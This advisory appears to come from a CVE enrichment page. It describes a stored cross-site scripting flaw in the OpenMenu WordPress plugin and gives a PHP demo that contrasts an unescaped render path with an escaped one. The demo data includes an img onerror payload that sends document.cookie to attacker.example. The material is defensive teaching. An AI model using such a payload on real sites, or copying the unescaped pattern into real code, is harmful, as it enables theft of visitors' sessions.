Impact
The OpenMenu plugin for WordPress does not properly neutralize user-supplied input during web page generation, resulting in a stored cross-site scripting (XSS) vulnerability. An attacker who can submit data that the plugin stores and later renders can embed a script that executes in the browser of every visitor who views the affected menu. The weakness is classified as CWE-79. A script executed this way runs with the visitor's session: it can read information available to that session, alter data on the visitor's behalf, or deface the site.
Affected Systems
All releases of the OpenMenu WordPress plugin up to and including version 3.5 are affected. Any site running one of these releases is exposed.
Risk and Exploitability
The CVSS score of 6.5 corresponds to medium severity. The EPSS value below 1 % indicates a low probability of exploitation at present, and the vulnerability is not listed in CISA's KEV catalog. The likely attack vector is an input field exposed by the plugin whose contents are stored and later included in the generated page: an attacker who can submit data, typically through a menu creation or editing interface, leaves a payload that persists and is delivered to every user who views the menu. No public exploit is documented, but because the payload is stored once and then triggered by ordinary page views, exploitation needs no further action from the attacker and only routine browsing from the victims.
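The render path described above, as an added example that is not OpenMenu's code and does not reproduce the plugin's actual functions: a constructed set of stored menu items (one carrying an attacker-supplied payload), the vulnerable pattern that concatenates stored strings straight into HTML, and the hardened pattern that escapes every value where it meets the page. The function names, the menu structure, the payload and the attacker.example domain are all assumptions; htmlspecialchars() and strip_tags() stand in for WordPress's esc_html() and sanitize_text_field() so the file runs under plain PHP.

```php
<?php
// Added example, not OpenMenu's code: a minimal model of a stored XSS in a
// WordPress plugin that saves menu data and later renders it. Function names,
// the menu structure and the payload are constructed for illustration.

declare(strict_types=1);

// Constructed "database": what an attacker-controlled submission would leave
// behind after a menu-editing form is saved without sanitization.
function stored_menu_items(): array {
    return [
        ['name' => 'Margherita', 'description' => 'Tomato, mozzarella, basil'],
        ['name' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
         'description' => 'Looks like a menu item, runs in every visitor\'s browser'],
    ];
}

// Vulnerable render path (CWE-79): stored strings are concatenated straight
// into the page. Anything an editor typed becomes markup for every visitor.
function render_menu_vulnerable(array $items): string {
    $html = "<ul class=\"openmenu\">\n";
    foreach ($items as $item) {
        $html .= "  <li><strong>{$item['name']}</strong> - {$item['description']}</li>\n";
    }
    return $html . "</ul>\n";
}

// Escape for an HTML text node. In WordPress this is the job of esc_html();
// htmlspecialchars() is used here so the file runs with plain PHP.
function esc_text(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened render path: every stored value is escaped at the point where it
// meets HTML. The stored data is untouched; only its representation changes.
function render_menu_safe(array $items): string {
    $html = "<ul class=\"openmenu\">\n";
    foreach ($items as $item) {
        $html .= '  <li><strong>' . esc_text($item['name']) . '</strong> - '
               . esc_text($item['description']) . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Defence in depth on the write side: strip tags before storing, so a bypass
// in one output path does not become a persistent script.
// (WordPress: sanitize_text_field() on save; here strip_tags() stands in.)
function sanitize_menu_item(array $item): array {
    return array_map(static fn(string $v): string => trim(strip_tags($v)), $item);
}

// Crude marker for the demo: does the rendered page still contain an inline
// event-handler attribute inside a tag?
function contains_inline_handler(string $html): bool {
    return (bool) preg_match('/<[^>]+\son[a-z]+\s*=/i', $html);
}

$items = stored_menu_items();

$vuln = render_menu_vulnerable($items);
$safe = render_menu_safe($items);
$safe_and_sanitized = render_menu_safe(array_map('sanitize_menu_item', $items));

echo "vulnerable output carries an inline handler: " . var_export(contains_inline_handler($vuln), true) . "\n";
echo "escaped output carries an inline handler:    " . var_export(contains_inline_handler($safe), true) . "\n";
echo $vuln, "\n", $safe, "\n", $safe_and_sanitized;
```

Run it with `php example.php`. The first line reports `true` and the second `false`: the same stored record renders as a working `<img onerror>` in the vulnerable path and as inert text in the escaped path. Output escaping is the fix that actually closes CWE-79; input sanitization on save is worth adding as well, but on its own it is not sufficient, since any other output path that forgets to escape reintroduces the bug, and it also changes what the site stores.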
OpenCVE Enrichment